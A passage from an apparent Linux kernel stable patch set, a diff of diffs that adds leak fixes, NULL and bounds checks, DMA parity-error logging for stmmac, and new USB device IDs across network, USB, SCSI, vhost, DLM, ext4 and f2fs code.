++	aq_ring_hwts_rx_free(&aq_ptp->hwts_rx);
+ 
+ 	aq_ptp_skb_ring_release(&aq_ptp->skb_ring);
+ }
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 9c314fe14ab62..0eaaba3a18ee0 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -919,6 +919,19 @@ void aq_ring_free(struct aq_ring_s *self)
+ 	}
+ }
+ 
++void aq_ring_hwts_rx_free(struct aq_ring_s *self)
++{
++	if (!self)
++		return;
++
++	if (self->dx_ring) {
++		dma_free_coherent(aq_nic_get_dev(self->aq_nic),
++				  self->size * self->dx_size + AQ_CFG_RXDS_DEF,
++				  self->dx_ring, self->dx_ring_pa);
++		self->dx_ring = NULL;
++	}
++}
++
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data)
+ {
+ 	unsigned int count;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+index 52847310740a2..d627ace850ff5 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.h
+@@ -210,6 +210,7 @@ int aq_ring_rx_fill(struct aq_ring_s *self);
+ int aq_ring_hwts_rx_alloc(struct aq_ring_s *self,
+ 			  struct aq_nic_s *aq_nic, unsigned int idx,
+ 			  unsigned int size, unsigned int dx_size);
++void aq_ring_hwts_rx_free(struct aq_ring_s *self);
+ void aq_ring_hwts_rx_clean(struct aq_ring_s *self, struct aq_nic_s *aq_nic);
+ 
+ unsigned int aq_ring_fill_stats_data(struct aq_ring_s *self, u64 *data);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 0f896f606c3e6..c00d6d67db518 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -930,8 +930,11 @@ int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
+ 	if (pfvf->ptp && qidx < pfvf->hw.tx_queues) {
+ 		err = qmem_alloc(pfvf->dev, &sq->timestamps, qset->sqe_cnt,
+ 				 sizeof(*sq->timestamps));
+-		if (err)
++		if (err) {
++			kfree(sq->sg);
++			sq->sg = NULL;
+ 			return err;
++		}
+ 	}
+ 
+ 	sq->head = 0;
+@@ -947,7 +950,14 @@ int otx2_sq_init(struct otx2_nic *pfvf, u16 qidx, u16 sqb_aura)
+ 	sq->stats.bytes = 0;
+ 	sq->stats.pkts = 0;
+ 
+-	return pfvf->hw_ops->sq_aq_init(pfvf, qidx, sqb_aura);
++	err = pfvf->hw_ops->sq_aq_init(pfvf, qidx, sqb_aura);
++	if (err) {
++		kfree(sq->sg);
++		sq->sg = NULL;
++		return err;
++	}
++
++	return 0;
+ 
+ }
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index 54bb072aeb2d3..c11d626856247 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -209,6 +209,7 @@ struct stmmac_safety_stats {
+ 	unsigned long mac_errors[32];
+ 	unsigned long mtl_errors[32];
+ 	unsigned long dma_errors[32];
++	unsigned long dma_dpp_errors[32];
+ };
+ 
+ /* Number of fields in Safety Stats */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+index 880a75bf2eb1f..8748c37e9dac9 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2.h
+@@ -282,6 +282,8 @@
+ #define XGMAC_RXCEIE			BIT(4)
+ #define XGMAC_TXCEIE			BIT(0)
+ #define XGMAC_MTL_ECC_INT_STATUS	0x000010cc
++#define XGMAC_MTL_DPP_CONTROL		0x000010e0
++#define XGMAC_DPP_DISABLE		BIT(0)
+ #define XGMAC_MTL_TXQ_OPMODE(x)		(0x00001100 + (0x80 * (x)))
+ #define XGMAC_TQS			GENMASK(25, 16)
+ #define XGMAC_TQS_SHIFT			16
+@@ -364,6 +366,7 @@
+ #define XGMAC_DCEIE			BIT(1)
+ #define XGMAC_TCEIE			BIT(0)
+ #define XGMAC_DMA_ECC_INT_STATUS	0x0000306c
++#define XGMAC_DMA_DPP_INT_STATUS	0x00003074
+ #define XGMAC_DMA_CH_CONTROL(x)		(0x00003100 + (0x80 * (x)))
+ #define XGMAC_SPH			BIT(24)
+ #define XGMAC_PBLx8			BIT(16)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index c2181c277291b..ec1616ffbfa7a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -789,6 +789,44 @@ static const struct dwxgmac3_error_desc dwxgmac3_dma_errors[32]= {
+ 	{ false, "UNKNOWN", "Unknown Error" }, /* 31 */
+ };
+ 
++#define DPP_RX_ERR "Read Rx Descriptor Parity checker Error"
++#define DPP_TX_ERR "Read Tx Descriptor Parity checker Error"
++
++static const struct dwxgmac3_error_desc dwxgmac3_dma_dpp_errors[32] = {
++	{ true, "TDPES0", DPP_TX_ERR },
++	{ true, "TDPES1", DPP_TX_ERR },
++	{ true, "TDPES2", DPP_TX_ERR },
++	{ true, "TDPES3", DPP_TX_ERR },
++	{ true, "TDPES4", DPP_TX_ERR },
++	{ true, "TDPES5", DPP_TX_ERR },
++	{ true, "TDPES6", DPP_TX_ERR },
++	{ true, "TDPES7", DPP_TX_ERR },
++	{ true, "TDPES8", DPP_TX_ERR },
++	{ true, "TDPES9", DPP_TX_ERR },
++	{ true, "TDPES10", DPP_TX_ERR },
++	{ true, "TDPES11", DPP_TX_ERR },
++	{ true, "TDPES12", DPP_TX_ERR },
++	{ true, "TDPES13", DPP_TX_ERR },
++	{ true, "TDPES14", DPP_TX_ERR },
++	{ true, "TDPES15", DPP_TX_ERR },
++	{ true, "RDPES0", DPP_RX_ERR },
++	{ true, "RDPES1", DPP_RX_ERR },
++	{ true, "RDPES2", DPP_RX_ERR },
++	{ true, "RDPES3", DPP_RX_ERR },
++	{ true, "RDPES4", DPP_RX_ERR },
++	{ true, "RDPES5", DPP_RX_ERR },
++	{ true, "RDPES6", DPP_RX_ERR },
++	{ true, "RDPES7", DPP_RX_ERR },
++	{ true, "RDPES8", DPP_RX_ERR },
++	{ true, "RDPES9", DPP_RX_ERR },
++	{ true, "RDPES10", DPP_RX_ERR },
++	{ true, "RDPES11", DPP_RX_ERR },
++	{ true, "RDPES12", DPP_RX_ERR },
++	{ true, "RDPES13", DPP_RX_ERR },
++	{ true, "RDPES14", DPP_RX_ERR },
++	{ true, "RDPES15", DPP_RX_ERR },
++};
++
+ static void dwxgmac3_handle_dma_err(struct net_device *ndev,
+ 				    void __iomem *ioaddr, bool correctable,
+ 				    struct stmmac_safety_stats *stats)
+@@ -800,6 +838,13 @@ static void dwxgmac3_handle_dma_err(struct net_device *ndev,
+ 
+ 	dwxgmac3_log_error(ndev, value, correctable, "DMA",
+ 			   dwxgmac3_dma_errors, STAT_OFF(dma_errors), stats);
++
++	value = readl(ioaddr + XGMAC_DMA_DPP_INT_STATUS);
++	writel(value, ioaddr + XGMAC_DMA_DPP_INT_STATUS);
++
++	dwxgmac3_log_error(ndev, value, false, "DMA_DPP",
++			   dwxgmac3_dma_dpp_errors,
++			   STAT_OFF(dma_dpp_errors), stats);
+ }
+ 
+ static int
+@@ -838,6 +883,12 @@ dwxgmac3_safety_feat_config(void __iomem *ioaddr, unsigned int asp,
+ 	value |= XGMAC_TMOUTEN; /* FSM Timeout Feature */
+ 	writel(value, ioaddr + XGMAC_MAC_FSM_CONTROL);
+ 
++	/* 5. Enable Data Path Parity Protection */
++	value = readl(ioaddr + XGMAC_MTL_DPP_CONTROL);
++	/* already enabled by default, explicit enable it again */
++	value &= ~XGMAC_DPP_DISABLE;
++	writel(value, ioaddr + XGMAC_MTL_DPP_CONTROL);
++
+ 	return 0;
+ }
+ 
+@@ -871,7 +922,11 @@ static int dwxgmac3_safety_feat_irq_status(struct net_device *ndev,
+ 		ret |= !corr;
+ 	}
+ 
+-	err = dma & (XGMAC_DEUIS | XGMAC_DECIS);
++	/* DMA_DPP_Interrupt_Status is indicated by MCSIS bit in
++	 * DMA_Safety_Interrupt_Status, so we handle DMA Data Path
++	 * Parity Errors here
++	 */
++	err = dma & (XGMAC_DEUIS | XGMAC_DECIS | XGMAC_MCSIS);
+ 	corr = dma & XGMAC_DECIS;
+ 	if (err) {
+ 		dwxgmac3_handle_dma_err(ndev, ioaddr, corr, stats);
+@@ -887,6 +942,7 @@ static const struct dwxgmac3_error {
+ 	{ dwxgmac3_mac_errors },
+ 	{ dwxgmac3_mtl_errors },
+ 	{ dwxgmac3_dma_errors },
++	{ dwxgmac3_dma_dpp_errors },
+ };
+ 
+ static int dwxgmac3_safety_feat_dump(struct stmmac_safety_stats *stats,
+diff --git a/drivers/net/netdevsim/dev.c b/drivers/net/netdevsim/dev.c
+index c3fbdd6b68baf..f3fa4bd121169 100644
+--- a/drivers/net/netdevsim/dev.c
++++ b/drivers/net/netdevsim/dev.c
+@@ -835,14 +835,14 @@ static void nsim_dev_trap_report_work(struct work_struct *work)
+ 				      trap_report_dw.work);
+ 	nsim_dev = nsim_trap_data->nsim_dev;
+ 
+-	/* For each running port and enabled packet trap, generate a UDP
+-	 * packet with a random 5-tuple and report it.
+-	 */
+ 	if (!devl_trylock(priv_to_devlink(nsim_dev))) {
+-		schedule_delayed_work(&nsim_dev->trap_data->trap_report_dw, 0);
++		schedule_delayed_work(&nsim_dev->trap_data->trap_report_dw, 1);
+ 		return;
+ 	}
+ 
++	/* For each running port and enabled packet trap, generate a UDP
++	 * packet with a random 5-tuple and report it.
++	 */
+ 	list_for_each_entry(nsim_dev_port, &nsim_dev->port_list, list) {
+ 		if (!netif_running(nsim_dev_port->ns->netdev))
+ 			continue;
+diff --git a/drivers/net/ppp/ppp_async.c b/drivers/net/ppp/ppp_async.c
+index 15a179631903f..abc65c4d7a303 100644
+--- a/drivers/net/ppp/ppp_async.c
++++ b/drivers/net/ppp/ppp_async.c
+@@ -469,6 +469,10 @@ ppp_async_ioctl(struct ppp_channel *chan, unsigned int cmd, unsigned long arg)
+ 	case PPPIOCSMRU:
+ 		if (get_user(val, p))
+ 			break;
++		if (val > U16_MAX) {
++			err = -EINVAL;
++			break;
++		}
+ 		if (val < PPP_MRU)
+ 			val = PPP_MRU;
+ 		ap->mru = val;
+diff --git a/drivers/phy/renesas/phy-rcar-gen3-usb2.c b/drivers/phy/renesas/phy-rcar-gen3-usb2.c
+index 9de617ca9daa2..7e61c6b278a74 100644
+--- a/drivers/phy/renesas/phy-rcar-gen3-usb2.c
++++ b/drivers/phy/renesas/phy-rcar-gen3-usb2.c
+@@ -675,8 +675,6 @@ static int rcar_gen3_phy_usb2_probe(struct platform_device *pdev)
+ 	channel->irq = platform_get_irq_optional(pdev, 0);
+ 	channel->dr_mode = rcar_gen3_get_dr_mode(dev->of_node);
+ 	if (channel->dr_mode != USB_DR_MODE_UNKNOWN) {
+-		int ret;
+-
+ 		channel->is_otg_channel = true;
+ 		channel->uses_otg_pins = !of_property_read_bool(dev->of_node,
+ 							"renesas,no-otg-pins");
+@@ -740,8 +738,6 @@ static int rcar_gen3_phy_usb2_probe(struct platform_device *pdev)
+ 		ret = PTR_ERR(provider);
+ 		goto error;
+ 	} else if (channel->is_otg_channel) {
+-		int ret;
+-
+ 		ret = device_create_file(dev, &dev_attr_role);
+ 		if (ret < 0)
+ 			goto error;
+diff --git a/drivers/phy/ti/phy-omap-usb2.c b/drivers/phy/ti/phy-omap-usb2.c
+index 31a775877f6e3..63c45809943ff 100644
+--- a/drivers/phy/ti/phy-omap-usb2.c
++++ b/drivers/phy/ti/phy-omap-usb2.c
+@@ -116,7 +116,7 @@ static int omap_usb_set_vbus(struct usb_otg *otg, bool enabled)
+ {
+ 	struct omap_usb *phy = phy_to_omapusb(otg->usb_phy);
+ 
+-	if (!phy->comparator)
++	if (!phy->comparator || !phy->comparator->set_vbus)
+ 		return -ENODEV;
+ 
+ 	return phy->comparator->set_vbus(phy->comparator, enabled);
+@@ -126,7 +126,7 @@ static int omap_usb_start_srp(struct usb_otg *otg)
+ {
+ 	struct omap_usb *phy = phy_to_omapusb(otg->usb_phy);
+ 
+-	if (!phy->comparator)
++	if (!phy->comparator || !phy->comparator->start_srp)
+ 		return -ENODEV;
+ 
+ 	return phy->comparator->start_srp(phy->comparator);
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 66290961c47c2..cfa6f0edff17c 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -277,11 +277,12 @@ static void scsi_eh_inc_host_failed(struct rcu_head *head)
+ {
+ 	struct scsi_cmnd *scmd = container_of(head, typeof(*scmd), rcu);
+ 	struct Scsi_Host *shost = scmd->device->host;
++	unsigned int busy = scsi_host_busy(shost);
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(shost->host_lock, flags);
+ 	shost->host_failed++;
+-	scsi_eh_wakeup(shost, scsi_host_busy(shost));
++	scsi_eh_wakeup(shost, busy);
+ 	spin_unlock_irqrestore(shost->host_lock, flags);
+ }
+ 
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index 0e7e9f1e5a029..5c5954b78585e 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -280,9 +280,11 @@ static void scsi_dec_host_busy(struct Scsi_Host *shost, struct scsi_cmnd *cmd)
+ 	rcu_read_lock();
+ 	__clear_bit(SCMD_STATE_INFLIGHT, &cmd->state);
+ 	if (unlikely(scsi_host_in_recovery(shost))) {
++		unsigned int busy = scsi_host_busy(shost);
++
+ 		spin_lock_irqsave(shost->host_lock, flags);
+ 		if (shost->host_failed || shost->host_eh_scheduled)
+-			scsi_eh_wakeup(shost, scsi_host_busy(shost));
++			scsi_eh_wakeup(shost, busy);
+ 		spin_unlock_irqrestore(shost->host_lock, flags);
+ 	}
+ 	rcu_read_unlock();
+diff --git a/drivers/usb/dwc3/host.c b/drivers/usb/dwc3/host.c
+index f6f13e7f1ba14..f4d8e80c4c347 100644
+--- a/drivers/usb/dwc3/host.c
++++ b/drivers/usb/dwc3/host.c
+@@ -66,7 +66,7 @@ out:
+ 
+ int dwc3_host_init(struct dwc3 *dwc)
+ {
+-	struct property_entry	props[4];
++	struct property_entry	props[5];
+ 	struct platform_device	*xhci;
+ 	int			ret, irq;
+ 	int			prop_idx = 0;
+@@ -94,6 +94,8 @@ int dwc3_host_init(struct dwc3 *dwc)
+ 
+ 	memset(props, 0, sizeof(struct property_entry) * ARRAY_SIZE(props));
+ 
++	props[prop_idx++] = PROPERTY_ENTRY_BOOL("xhci-sg-trb-cache-size-quirk");
++
+ 	if (dwc->usb3_lpm_capable)
+ 		props[prop_idx++] = PROPERTY_ENTRY_BOOL("usb3-lpm-capable");
+ 
+diff --git a/drivers/usb/host/xhci-plat.c b/drivers/usb/host/xhci-plat.c
+index c9438dc56f5fc..b387d39bfb81d 100644
+--- a/drivers/usb/host/xhci-plat.c
++++ b/drivers/usb/host/xhci-plat.c
+@@ -301,6 +301,9 @@ static int xhci_plat_probe(struct platform_device *pdev)
+ 		if (device_property_read_bool(tmpdev, "quirk-broken-port-ped"))
+ 			xhci->quirks |= XHCI_BROKEN_PORT_PED;
+ 
++		if (device_property_read_bool(tmpdev, "xhci-sg-trb-cache-size-quirk"))
++			xhci->quirks |= XHCI_SG_TRB_CACHE_SIZE_QUIRK;
++
+ 		device_property_read_u32(tmpdev, "imod-interval-ns",
+ 					 &xhci->imod_interval);
+ 	}
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index f1d7a5a863aa4..b3e60b3847941 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -146,6 +146,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x85F8) }, /* Virtenio Preon32 */
+ 	{ USB_DEVICE(0x10C4, 0x8664) }, /* AC-Services CAN-IF */
+ 	{ USB_DEVICE(0x10C4, 0x8665) }, /* AC-Services OBD-IF */
++	{ USB_DEVICE(0x10C4, 0x87ED) }, /* IMST USB-Stick for Smart Meter */
+ 	{ USB_DEVICE(0x10C4, 0x8856) },	/* CEL EM357 ZigBee USB Stick - LR */
+ 	{ USB_DEVICE(0x10C4, 0x8857) },	/* CEL EM357 ZigBee USB Stick */
+ 	{ USB_DEVICE(0x10C4, 0x88A4) }, /* MMB Networks ZigBee USB Device */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 4adef92598709..c0a0cca65437f 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -2269,6 +2269,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0111, 0xff) },			/* Fibocom FM160 (MBIM mode) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a0, 0xff) },			/* Fibocom NL668-AM/NL652-EU (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a2, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a3, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a4, 0xff),			/* Fibocom FM101-GL (laptop MBIM) */
+ 	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2df3, 0x9d03, 0xff) },			/* LongSung M5710 */
+diff --git a/drivers/usb/serial/qcserial.c b/drivers/usb/serial/qcserial.c
+index b1e844bf31f81..703a9c5635573 100644
+--- a/drivers/usb/serial/qcserial.c
++++ b/drivers/usb/serial/qcserial.c
+@@ -184,6 +184,8 @@ static const struct usb_device_id id_table[] = {
+ 	{DEVICE_SWI(0x413c, 0x81d0)},   /* Dell Wireless 5819 */
+ 	{DEVICE_SWI(0x413c, 0x81d1)},   /* Dell Wireless 5818 */
+ 	{DEVICE_SWI(0x413c, 0x81d2)},   /* Dell Wireless 5818 */
++	{DEVICE_SWI(0x413c, 0x8217)},	/* Dell Wireless DW5826e */
++	{DEVICE_SWI(0x413c, 0x8218)},	/* Dell Wireless DW5826e QDL */
+ 
+ 	/* Huawei devices */
+ 	{DEVICE_HWI(0x03f0, 0x581d)},	/* HP lt4112 LTE/HSPA+ Gobi 4G Modem (Huawei me906e) */
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 2eea080298812..61c72e62abd49 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -2588,12 +2588,11 @@ EXPORT_SYMBOL_GPL(vhost_disable_notify);
+ /* Create a new message. */
+ struct vhost_msg_node *vhost_new_msg(struct vhost_virtqueue *vq, int type)
+ {
+-	struct vhost_msg_node *node = kmalloc(sizeof *node, GFP_KERNEL);
++	/* Make sure all padding within the structure is initialized. */
++	struct vhost_msg_node *node = kzalloc(sizeof(*node), GFP_KERNEL);
+ 	if (!node)
+ 		return NULL;
+ 
+-	/* Make sure all padding within the structure is initialized. */
+-	memset(&node->msg, 0, sizeof node->msg);
+ 	node->vq = vq;
+ 	node->msg.type = type;
+ 	return node;
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 72f34f96d0155..2c797eb519da9 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -174,7 +174,7 @@ static LIST_HEAD(dlm_node_addrs);
+ static DEFINE_SPINLOCK(dlm_node_addrs_spin);
+ 
+ static struct listen_connection listen_con;
+-static struct sockaddr_storage *dlm_local_addr[DLM_MAX_ADDR_COUNT];
++static struct sockaddr_storage dlm_local_addr[DLM_MAX_ADDR_COUNT];
+ static int dlm_local_count;
+ int dlm_allow_conn;
+ 
+@@ -398,7 +398,7 @@ static int nodeid_to_addr(int nodeid, struct sockaddr_storage *sas_out,
+ 	if (!sa_out)
+ 		return 0;
+ 
+-	if (dlm_local_addr[0]->ss_family == AF_INET) {
++	if (dlm_local_addr[0].ss_family == AF_INET) {
+ 		struct sockaddr_in *in4  = (struct sockaddr_in *) &sas;
+ 		struct sockaddr_in *ret4 = (struct sockaddr_in *) sa_out;
+ 		ret4->sin_addr.s_addr = in4->sin_addr.s_addr;
+@@ -727,7 +727,7 @@ static void add_sock(struct socket *sock, struct connection *con)
+ static void make_sockaddr(struct sockaddr_storage *saddr, uint16_t port,
+ 			  int *addr_len)
+ {
+-	saddr->ss_family =  dlm_local_addr[0]->ss_family;
++	saddr->ss_family =  dlm_local_addr[0].ss_family;
+ 	if (saddr->ss_family == AF_INET) {
+ 		struct sockaddr_in *in4_addr = (struct sockaddr_in *)saddr;
+ 		in4_addr->sin_port = cpu_to_be16(port);
+@@ -1167,7 +1167,7 @@ static int sctp_bind_addrs(struct socket *sock, uint16_t port)
+ 	int i, addr_len, result = 0;
+ 
+ 	for (i = 0; i < dlm_local_count; i++) {
+-		memcpy(&localaddr, dlm_local_addr[i], sizeof(localaddr));
++		memcpy(&localaddr, &dlm_local_addr[i], sizeof(localaddr));
+ 		make_sockaddr(&localaddr, port, &addr_len);
+ 
+ 		if (!i)
+@@ -1187,7 +1187,7 @@ static int sctp_bind_addrs(struct socket *sock, uint16_t port)
+ /* Get local addresses */
+ static void init_local(void)
+ {
+-	struct sockaddr_storage sas, *addr;
++	struct sockaddr_storage sas;
+ 	int i;
+ 
+ 	dlm_local_count = 0;
+@@ -1195,21 +1195,10 @@ static void init_local(void)
+ 		if (dlm_our_addr(&sas, i))
+ 			break;
+ 
+-		addr = kmemdup(&sas, sizeof(*addr), GFP_NOFS);
+-		if (!addr)
+-			break;
+-		dlm_local_addr[dlm_local_count++] = addr;
++		memcpy(&dlm_local_addr[dlm_local_count++], &sas, sizeof(sas));
+ 	}
+ }
+ 
+-static void deinit_local(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < dlm_local_count; i++)
+-		kfree(dlm_local_addr[i]);
+-}
+-
+ static struct writequeue_entry *new_writequeue_entry(struct connection *con)
+ {
+ 	struct writequeue_entry *entry;
+@@ -1575,7 +1564,7 @@ static void dlm_connect(struct connection *con)
+ 	}
+ 
+ 	/* Create a socket to communicate with */
+-	result = sock_create_kern(&init_net, dlm_local_addr[0]->ss_family,
++	result = sock_create_kern(&init_net, dlm_local_addr[0].ss_family,
+ 				  SOCK_STREAM, dlm_proto_ops->proto, &sock);
+ 	if (result < 0)
+ 		goto socket_err;
+@@ -1786,7 +1775,6 @@ void dlm_lowcomms_stop(void)
+ 	foreach_conn(free_conn);
+ 	srcu_read_unlock(&connections_srcu, idx);
+ 	work_stop();
+-	deinit_local();
+ 
+ 	dlm_proto_ops = NULL;
+ }
+@@ -1803,7 +1791,7 @@ static int dlm_listen_for_all(void)
+ 	if (result < 0)
+ 		return result;
+ 
+-	result = sock_create_kern(&init_net, dlm_local_addr[0]->ss_family,
++	result = sock_create_kern(&init_net, dlm_local_addr[0].ss_family,
+ 				  SOCK_STREAM, dlm_proto_ops->proto, &sock);
+ 	if (result < 0) {
+ 		log_print("Can't create comms socket: %d", result);
+@@ -1842,7 +1830,7 @@ static int dlm_tcp_bind(struct socket *sock)
+ 	/* Bind to our cluster-known address connecting to avoid
+ 	 * routing problems.
+ 	 */
+-	memcpy(&src_addr, dlm_local_addr[0], sizeof(src_addr));
++	memcpy(&src_addr, &dlm_local_addr[0], sizeof(src_addr));
+ 	make_sockaddr(&src_addr, 0, &addr_len);
+ 
+ 	result = kernel_bind(sock, (struct sockaddr *)&src_addr,
+@@ -1899,9 +1887,9 @@ static int dlm_tcp_listen_bind(struct socket *sock)
+ 	int addr_len;
+ 
+ 	/* Bind to our port */
+-	make_sockaddr(dlm_local_addr[0], dlm_config.ci_tcp_port, &addr_len);
++	make_sockaddr(&dlm_local_addr[0], dlm_config.ci_tcp_port, &addr_len);
+ 	return kernel_bind(sock, (struct sockaddr *)&dlm_local_addr[0],
+-			   addr_len);
++		           addr_len);
+ }
+ 
+ static const struct dlm_proto_ops dlm_tcp_ops = {
+@@ -1992,7 +1980,7 @@ int dlm_lowcomms_start(void)
+ 
+ 	error = work_start();
+ 	if (error)
+-		goto fail_local;
++		goto fail;
+ 
+ 	dlm_allow_conn = 1;
+ 
+@@ -2022,8 +2010,6 @@ fail_listen:
+ fail_proto_ops:
+ 	dlm_allow_conn = 0;
+ 	work_stop();
+-fail_local:
+-	deinit_local();
+ fail:
+ 	return error;
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index c1515daf1def1..40903c172a34f 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -1118,6 +1118,24 @@ void ext4_mb_generate_buddy(struct super_block *sb,
+ 	atomic64_add(period, &sbi->s_mb_generation_time);
+ }
+ 
++static void mb_regenerate_buddy(struct ext4_buddy *e4b)
++{
++	int count;
++	int order = 1;
++	void *buddy;
++
++	while ((buddy = mb_find_buddy(e4b, order++, &count)))
++		mb_set_bits(buddy, 0, count);
++
++	e4b->bd_info->bb_fragments = 0;
++	memset(e4b->bd_info->bb_counters, 0,
++		sizeof(*e4b->bd_info->bb_counters) *
++		(e4b->bd_sb->s_blocksize_bits + 2));
++
++	ext4_mb_generate_buddy(e4b->bd_sb, e4b->bd_buddy,
++		e4b->bd_bitmap, e4b->bd_group, e4b->bd_info);
++}
++
+ /* The buddy information is attached the buddy cache inode
+  * for convenience. The information regarding each group
+  * is loaded via ext4_mb_load_buddy. The information involve
+@@ -1796,6 +1814,8 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 			ext4_mark_group_bitmap_corrupted(
+ 				sb, e4b->bd_group,
+ 				EXT4_GROUP_INFO_BBITMAP_CORRUPT);
++		} else {
++			mb_regenerate_buddy(e4b);
+ 		}
+ 		goto done;
+ 	}
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 3d9f6495a4db4..967262c37da52 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -55,6 +55,7 @@ struct f2fs_compress_ops {
+ 	int (*init_decompress_ctx)(struct decompress_io_ctx *dic);
+ 	void (*destroy_decompress_ctx)(struct decompress_io_ctx *dic);
+ 	int (*decompress_pages)(struct decompress_io_ctx *dic);
++	bool (*is_level_valid)(int level);
+ };
+ 
+ static unsigned int offset_in_cluster(struct compress_ctx *cc, pgoff_t index)
+@@ -322,11 +323,21 @@ static int lz4_decompress_pages(struct decompress_io_ctx *dic)
+ 	return 0;
+ }
+ 
++static bool lz4_is_level_valid(int lvl)
++{
++#ifdef CONFIG_F2FS_FS_LZ4HC
++	return !lvl || (lvl >= LZ4HC_MIN_CLEVEL && lvl <= LZ4HC_MAX_CLEVEL);
++#else
++	return lvl == 0;
++#endif
++}
++
+ static const struct f2fs_compress_ops f2fs_lz4_ops = {
+ 	.init_compress_ctx	= lz4_init_compress_ctx,
+ 	.destroy_compress_ctx	= lz4_destroy_compress_ctx,
+ 	.compress_pages		= lz4_compress_pages,
+ 	.decompress_pages	= lz4_decompress_pages,
++	.is_level_valid		= lz4_is_level_valid,
+ };
+ #endif
+ 
+@@ -490,6 +501,11 @@ static int zstd_decompress_pages(struct decompress_io_ctx *dic)
+ 	return 0;
+ }
+ 
++static bool zstd_is_level_valid(int lvl)
++{
++	return lvl >= zstd_min_clevel() && lvl <= zstd_max_clevel();
++}
++
+ static const struct f2fs_compress_ops f2fs_zstd_ops = {
+ 	.init_compress_ctx	= zstd_init_compress_ctx,
+ 	.destroy_compress_ctx	= zstd_destroy_compress_ctx,
+@@ -497,6 +513,7 @@ static const struct f2fs_compress_ops f2fs_zstd_ops = {
+ 	.init_decompress_ctx	= zstd_init_decompress_ctx,
+ 	.destroy_decompress_ctx	= zstd_destroy_decompress_ctx,
+ 	.decompress_pages	= zstd_decompress_pages,
++	.is_level_valid		= zstd_is_level_valid,
+ };
+ #endif
+ 
+@@ -555,6 +572,16 @@ bool f2fs_is_compress_backend_ready(struct inode *inode)
+ 	return f2fs_cops[F2FS_I(inode)->i_compress_algorithm];
+ }
+ 
++bool f2fs_is_compress_level_valid(int alg, int lvl)
++{
++	const struct f2fs_compress_ops *cops = f2fs_cops[alg];
++
++	if (cops->is_level_valid)
++		return cops->is_level_valid(lvl);
++
++	return lvl == 0;
++}
++
+ static mempool_t *compress_page_pool;
+ static int num_compress_pages = 512;
+ module_param(num_compress_pages, uint, 0444);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 5c76ba764b71f..e5a9498b89c06 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -4219,6 +4219,7 @@ bool f2fs_compress_write_end(struct inode *inode, void *fsdata,
+ int f2fs_truncate_partial_cluster(struct inode *inode, u64 from, bool lock);
